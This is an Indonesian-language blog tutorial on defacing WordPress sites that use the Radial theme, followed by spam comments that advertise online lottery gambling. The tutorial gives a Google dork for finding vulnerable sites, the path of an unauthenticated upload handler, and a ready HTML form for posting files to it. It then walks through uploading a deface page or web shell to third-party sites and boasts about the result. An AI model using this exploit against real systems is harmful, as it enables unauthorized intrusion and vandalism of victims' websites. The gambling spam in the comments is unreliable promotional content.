Hey ho kali ini afik mau share tutor deface wordpress plugin theme radial
oke langsung aja eaaaa biar gak kelamaan
Bahan
1. dork : inurl:/wp-content/themes/radial-theme/ (kembangin lagi eaaaa)
2.exploit : /wp-content/themes/radial-theme/functions/upload-handler.php
3. csrf :
<form enctype="multipart/form-data"action="http://target.com/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="UPLOAD!" />
</form>
(copy csrf ke notepad /notepad ++, simpan dengan extensi html)
4. script deface / shell
oke kita langsung ke langkah2 nya
1. Dorking gugel dulu
2. kalo udah pilih salah satu site
3. masukan exploit di belakang nama site nya
contoh : www.target.com/wp-content/themes/radial-theme/functions/upload-handler.php
4. kalo vuln maka akan ada tulisan "error"
5. nah tinggal masukin site ke csrf kita tadi
6. buka csrf nya lewat web browser
7.upload deh script deface ato shell deface kita
8.kalo udah muncul file upload an kita
9. cara melihat hasil deface nya kek gini contoh yaa
site.com/wp-content/uploads/tahun/bulan/nama file
10. taraaaaa tampilan website nya pun berubah, tinggal pamerin ke temen lo deh :v kalo lo hekel awokawokawkok :v
oke sekian tutor dari gw, special thanks buat BERANDAL
kalo gk paham bisa lihat video nya di bawah sini
Rupiahtoto Bandar Togel Resmi di Indonesia
BalasHapusBagi anda yang ingin bermain judi togel online di pasaran resmi SGP, HK, dan Sydney, langsung saja ke link togel resmi anti blokir dari Bandar Terpercaya. Caranya anda hubungi customer service atau kunjungi blog unsurtoto http://www.oriskanycharterboats.com
BalasHapusJadi member agen togel online uang asli terpercaya dijamin untung setiap hari. Karena semua member akan mendapatkan fasilitas terbaik tahun 2020 dan bonus deposit setiap hari 5000 rupiah untuk pemain akitf. Untuk informasi lebih lanjut anda bisa kunjungi blog resmi unsurtoto http://chumbalacachumbala.org
BalasHapus